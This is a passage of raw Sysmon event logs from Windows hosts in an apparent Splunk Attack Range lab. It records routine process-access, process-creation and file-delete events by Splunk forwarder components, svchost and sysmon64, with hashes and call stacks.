Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.825{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D8E4A6BB5AF0DCBE99D60816F9B8ECD,SHA256=BB01BB27D1BB576726DF65A352FDAF9FE0172B5ACA270BE4A0F4E26DCA87A8CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:48.410{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31728EDFF909C4BFB4ACE4D94F1F3B1C,SHA256=4349CCA83D843F80817F69ED19C8797D1521C99CA3E7B300B926FD8F6AF3AEE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.544{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1135414B3A534DEEA12FA445D04A45B4,SHA256=178188C1BAA717B7F176262413AC664B2CCDE8C3A9DD5AE29E054D8AF77D2839,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.372{4F8D34B0-0E04-6216-F103-000000003902}28364016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E04-6216-F103-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214042Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214041Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214040Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0E04-6216-F103-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E04-6216-F103-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:48.107{4F8D34B0-0E04-6216-F103-000000003902}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:49.520{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=089A0D5C9FE3C0B8A9892DF125238F66,SHA256=742D86D90964A0DE63BE4D916AD0A1E595177C8D53152DBD2CDD16268BF1C8C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E05-6216-F303-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:49.810{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 